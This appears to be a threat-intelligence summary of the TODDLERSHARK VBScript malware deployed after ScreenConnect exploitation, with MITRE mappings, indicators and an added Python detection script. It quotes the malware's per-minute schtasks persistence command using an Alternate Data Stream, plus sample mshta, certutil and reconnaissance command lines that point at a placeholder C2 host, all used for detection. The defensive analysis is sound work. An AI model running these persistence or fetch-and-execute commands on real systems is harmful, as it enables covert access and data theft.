TODDLERSHARK: ScreenConnect Vulnerability Exploited to Deploy BABYSHARK Variant

Kroll CTI identified a VBScript-based malware family they call TODDLERSHARK, deployed after exploitation of ConnectWise ScreenConnect vulnerabilities (CVE-2024-1708 / CVE-2024-1709) and resembling the BABYSHARK toolset. The attack chain uses mshta to fetch a polymorphic VBScript that downloads a hex-encoded second stage which modifies registry macro settings, harvests system data, encodes it with certutil for exfiltration, and establishes persistence via a scheduled task hidden in an Alternate Data Stream. #TODDLERSHARK #ScreenConnect

Keypoints

  • Kroll CTI discovered TODDLERSHARK, a VBScript-based malware similar to BABYSHARK, used post-compromise after ScreenConnect exploitation.
  • Initial access exploited authentication bypass and path traversal in ScreenConnect (CVE-2024-1709 and CVE-2024-1708) to run commands on a victim host.
  • mshta.exe was used to download a heavily obfuscated VBScript; payloads are polymorphic with randomized names, junk code, and unique second-stage URLs, preventing stable file hashes.
  • The second-stage payload (hex-encoded) performs three main functions: set registry VBAWarnings keys, collect extensive system/network/security information, and create a scheduled task for periodic execution.
  • Stolen data is encoded into a PEM certificate via certutil and exfiltrated to a C2 web application; capture and certificate files are deleted after use.
  • Persistence is achieved by writing a VBScript to an Alternate Data Stream and creating a scheduled task (runs every minute) that fetches and executes responses from a unique C2 URL.
  • Detections recommended: flag mshta with URL args, certutil encoding, scheduled task creation (especially with ADS), and PowerShell/cmd spawning from mshta or encoded PowerShell usage.

MITRE Techniques

  • [T1132.001] Data Encoding: Standard Encoding – certutil was used to Base64-encode the stolen data into a PEM-style certificate file before exfiltration ( ‘certutil.exe encoding files’ ).
  • [T1053.005] Scheduled Task/Job: Scheduled Task – the malware created a task that runs every minute and calls wscript on a VBScript stored in an Alternate Data Stream; that script fetches and executes whatever a uniquely generated URL returns ( ‘schtasks /Create /SC minute /MO 1 /TN Uso1Cache /TR “wscript … .Uso1Config.conf:htaccess” /f’ ).
  • [T1218.005] System Binary Proxy Execution: Mshta – mshta.exe fetched and executed a remote VBScript and spawned cmd.exe to run additional commands ( ‘Detect mshta.exe executing with URL parameters’ ).
  • [T1027.010] Obfuscated Files or Information: Command Obfuscation – payloads used heavy obfuscation (randomized names, junk code, a hex-encoded second stage), and encoded PowerShell commands were also noted ( ‘PowerShell executing an encoded command’ ).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell (with [T1059.001] PowerShell) – cmd.exe ran the enumeration commands and spawned PowerShell for antivirus/product queries ( ‘Detect PowerShell execution from cmd.exe’ ).

Indicators of Compromise

  • [File paths] capture and ADS script locations – C:\ProgramData\[RANDOM_STRING].acl (capture files), C:\ProgramData\Uso1\.Uso1Config.conf:htaccess (VBScript stored in the htaccess Alternate Data Stream of .Uso1Config.conf).
  • [Scheduled task name] persistence – Uso1Cache (schtasks entry created to run every minute).
  • [C2 URLs / Domains] – the second-stage URL is embedded hex-encoded in each initial payload and is unique per fetch, and the persistence script requests a uniquely generated URL on each run, so no stable URL indicator exists. Kroll observed malicious activity for the destination domain on VirusTotal, but the domain is not listed in the article, so none is reproduced here.
  • [File hashes] polymorphic payloads – initial VBScript downloads change function/variable names and junk code so file hashes are not stable (no consistent hashes provided).

The technical procedure begins with exploitation of ConnectWise ScreenConnect (notably CVE-2024-1709 and CVE-2024-1708) to gain hands-on-keyboard access to a compromised host. The attacker uses cmd.exe to run mshta.exe with a URL that retrieves a heavily obfuscated VBScript; that initial script contains randomized function/variable names and large hex blobs and junk code so each download yields a unique file and hash. De-obfuscation reveals a second-stage payload encoded as a large hexadecimal string, and the C2 appears to generate unique second-stage URLs for each fetch.

The decoded second-stage implements three core capabilities. First, it writes registry keys setting VBAWarnings to 1 for multiple Office versions; a value of 1 corresponds to "Enable all macros", so Office documents delivered later can run VBA without prompting the user. Second, it executes a series of system and network enumeration commands (e.g., hostname, systeminfo, net user, ipconfig, netstat, tasklist, directory listings), redirecting output to a randomly named capture file. Third, it runs certutil to wrap the capture in a Base64 body with certificate headers (the "PEM certificate"), exfiltrates it to the C2, and deletes the capture and certificate files afterwards. The information stealer spawns multiple cmd.exe instances and uses PowerShell queries for antivirus/product information, increasing reconnaissance detail.

For persistence the malware writes a VBScript into an Alternate Data Stream and creates a scheduled task (schtasks) named Uso1Cache that runs every minute, calling wscript to execute the ADS script which requests a uniquely generated URL and passes any response to the VBScript execution engine. Because payloads are polymorphic and URLs are unique per run, detection should focus on behavioral indicators: mshta fetching remote scripts, certutil -encode usage, scheduled task creation referencing ADS, and anomalous cmd/PowerShell spawn chains. Patching affected ScreenConnect instances and hunting for these behaviors are the primary mitigations.
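The behavioral detections recommended above, as an added example rather than code from Kroll's write-up: a small Python triage routine run over constructed process-creation events (parent image, image, command line, as Sysmon Event ID 1 or Security 4688 would record them). The command lines, paths and the .invalid hostname are assembled from the descriptions and IOCs on this page, not captured telemetry. The ADS check deliberately excludes drive letters and URLs, the two common false positives for a naive colon match, and the benign look-alike events show which qualifiers keep the rules from firing on ordinary administration.

```python
"""Behavioral detections for the TODDLERSHARK chain, run over constructed
process-creation events. Added example; sample command lines are modelled on
the write-up's descriptions, not real telemetry."""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # parent image file name, e.g. "cmd.exe"
    image: str    # image file name, e.g. "mshta.exe"
    cmdline: str  # full command line as logged


URL_RE = re.compile(r"https?://", re.I)
DRIVE_RE = re.compile(r"^[A-Za-z]:(?=[\\/])")   # leading "C:\" drive spec
STREAM_RE = re.compile(r":[A-Za-z0-9_.$-]+$")   # trailing ":streamname"
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}


def has_ads_target(cmdline: str) -> bool:
    """True if a path-like token names an NTFS Alternate Data Stream
    (file.ext:stream). Drive letters and URLs are excluded so that
    'C:\\x' and 'http://...' do not count as streams."""
    for tok in cmdline.replace('"', " ").split():
        if URL_RE.search(tok):
            continue
        tok = DRIVE_RE.sub("", tok)
        if ("\\" in tok or "/" in tok or "." in tok) and STREAM_RE.search(tok):
            return True
    return False


def detect(ev: ProcEvent) -> list[str]:
    """Return the behavioral rules an event trips (empty list = nothing)."""
    img, parent, cl = ev.image.lower(), ev.parent.lower(), ev.cmdline
    hits: list[str] = []
    if img == "mshta.exe" and URL_RE.search(cl):
        hits.append("T1218.005: mshta.exe launched with a URL argument")
    if img in INTERPRETERS and parent == "mshta.exe":
        hits.append("T1218.005: mshta.exe spawned a script/command interpreter")
    if img == "certutil.exe" and re.search(r"(?i)(?:^|\s)-encode(?:hex)?(?:\s|$)", cl):
        hits.append("T1132.001: certutil.exe encoding a file")
    if img == "schtasks.exe" and re.search(r"(?i)/create\b", cl):
        tag = "T1053.005: schtasks /Create"
        if re.search(r"(?i)/sc\s+minute", cl):
            tag += ", per-minute cadence"
        if has_ads_target(cl):
            tag += ", action stored in an Alternate Data Stream"
        hits.append(tag)
    if img in {"powershell.exe", "pwsh.exe"}:
        # -e / -ec / -enc / -encodedcommand; PowerShell accepts any unambiguous
        # prefix, so extend this if your estate logs other spellings.
        if re.search(r"(?i)\s-e(?:c|nc(?:odedcommand)?)?\s", cl):
            hits.append("T1027.010: PowerShell -EncodedCommand")
        if parent == "cmd.exe":
            hits.append("T1059.003/T1059.001: cmd.exe spawned PowerShell (weak signal, correlate)")
    return hits


def triage(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> rule hits, omitting events that trip nothing."""
    result: dict[int, list[str]] = {}
    for i, ev in enumerate(events):
        hits = detect(ev)
        if hits:
            result[i] = hits
    return result


# Constructed sample events (placeholder hostname under the reserved .invalid
# TLD, made-up random capture name). Event 4 is assembled from the task name
# and ADS path the write-up lists; the base64 in event 2 is UTF-16LE
# "get-ciminstance", harmless.
SAMPLE_EVENTS = [
    ProcEvent("cmd.exe", "mshta.exe", "mshta http://c2.example.invalid/x/y"),
    ProcEvent("mshta.exe", "cmd.exe", r'cmd.exe /c "hostname >> C:\ProgramData\qx8f2.acl"'),
    ProcEvent("cmd.exe", "powershell.exe", "powershell -enc ZwBlAHQALQBjAGkAbQBpAG4AcwB0AGEAbgBjAGUA"),
    ProcEvent("cmd.exe", "certutil.exe", r"certutil -f -encode C:\ProgramData\qx8f2.acl C:\ProgramData\qx8f2.pem"),
    ProcEvent("cmd.exe", "schtasks.exe",
              r'schtasks /Create /SC minute /MO 1 /TN Uso1Cache '
              r'/TR "wscript C:\ProgramData\Uso1\.Uso1Config.conf:htaccess" /f'),
    # Benign look-alikes: neither the encoding nor the ADS qualifier should fire.
    ProcEvent("explorer.exe", "powershell.exe", r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ProcEvent("services.exe", "schtasks.exe", r'schtasks /Create /SC daily /TN NightlyBackup /TR "C:\Tools\backup.exe"'),
]

if __name__ == "__main__":
    for i, rules in triage(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[i]
        print(f"[{i}] {ev.parent} -> {ev.image}")
        for rule in rules:
            print("     ", rule)
```

The parent/child rules are the durable part: file hashes and URLs change on every fetch, but mshta reaching out to a URL, certutil encoding a file it did not verify, and a schtasks action whose path carries a stream name are stable across TODDLERSHARK samples. Feed real Sysmon or 4688 records into ProcEvent and treat the cmd.exe -> PowerShell rule as context to correlate with the others rather than as an alert on its own.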

Read more: https://www.kroll.com/en/insights/publications/cyber/screenconnect-vulnerability-exploited-to-deploy-babyshark